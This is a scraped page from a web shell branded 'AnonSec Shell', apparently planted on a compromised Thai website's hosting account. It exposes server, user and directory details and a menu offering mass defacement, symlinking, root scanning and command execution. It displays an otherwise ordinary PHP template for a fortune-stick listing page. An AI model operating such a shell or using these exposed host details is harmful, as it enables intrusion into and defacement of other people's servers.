AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cp648411/www/simded.com/themesv2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cp648411/www/simded.com/themesv2/seamsi_hilight.php
<div class="container">
  <div class="row my-3">
		<div class="col-me-12 ">
			<div class="borber-bottom-sim1"></div>
		</div>
	</div>
</div>

<div class="container">
  <div class="row">
    <div class="col-md-12  justify-content-between d-flex align-items-baseline " style="margin-bottom:5px;">
      <p class="HeadTextL mb-0 text-spacing-md fw-bold text-light"> เซียมซีวัดดัง </p>
      <form class="" action="seamsi.php" method="get">
        <input type="hidden" name="type" value="1">
        <button type="submit" class="btn btn-link text-decoration-none text-danger-sim text-spacing-md fw-bold">เพิ่มเติม</button>
      </form>
    </div>
  </div>
</div>

<div class="container">
  <div class="row" >
    <?php
    $max_rows = 12; // แสดงจำนวนแถวต่อหน้า
    $page_number = 0;
    if(isset($_GET['page_number']))
    {
      $page_number = $_GET['page_number'];
    }

    $sql_s = 'status = "1" AND type="1"';
    $all_array =  array('table'=>'seamsi','where'=>$sql_s);
    $start_row = $page_number * $max_rows;
    $all_sql = $view_db->view($all_array);
    $all_result = $view_db->q_re($all_sql);
    $total_rows = $view_db->q_nr($all_result);
    $total_rows_num = $view_db->q_nr($all_result);
    $total_pages = ceil($total_rows/$max_rows)-1;
    ////////////////////////////////////////
    $list = array('table'=>'seamsi','where'=>$sql_s, 'limit'=> "$start_row,$max_rows",'order'=> "ORDER BY id DESC");
    $view = $view_db->view($list);
    $result = $view_db->q_re($view);
    $num_tr = 1;
    $num = 1+($page_number*$max_rows);
    ?>
    <?php	while($row_se = $view_db->q_ro($result)){ ?>

      <?php
      $css_text = '';$name_sh2 =  $row_se['name'];
      if(strlen($row_se['name']) > 70){
        $css_text = 'height: 74%;'; }
      else {
        $css_text = 'height: 78%;';
      }

       if($name_sh2=='ดูดวงไพ่ทาโรต์ MAJOR ARCANA'){$css_text = 'height: 74%;'; $name_sh2='ดูดวงไพ่ทาโรต <br>MAJOR ARCANA';}
      ?>
      <div class="col-12 col-sm-6 col-md-4 col-lg-3 Divmeasure mt-3">
        <div class="div_measure borber-bottom-sim1" onclick="window.location.href='predict.php?name=<?php echo $row_se['name_en'];?>'"
          style="background-image: url(../redbag/seamsi/<?php echo $row_se['image']?>);" role="button" tabindex="0">
          <div style="<?php echo $css_text; ?>"></div>
          <div class="px-3" align="center">
            <div class="div_measure_name btn btn-danger-sim rounded-pill w-100 border-warning-sim2 text-spacing-md lh-1" >
              <?php echo $name_sh2; ?>
            </div>
          </div>

        </div>
      </div>
    <?php  } ?>
  </div>
</div>

Anon7 - 2022
AnonSec Team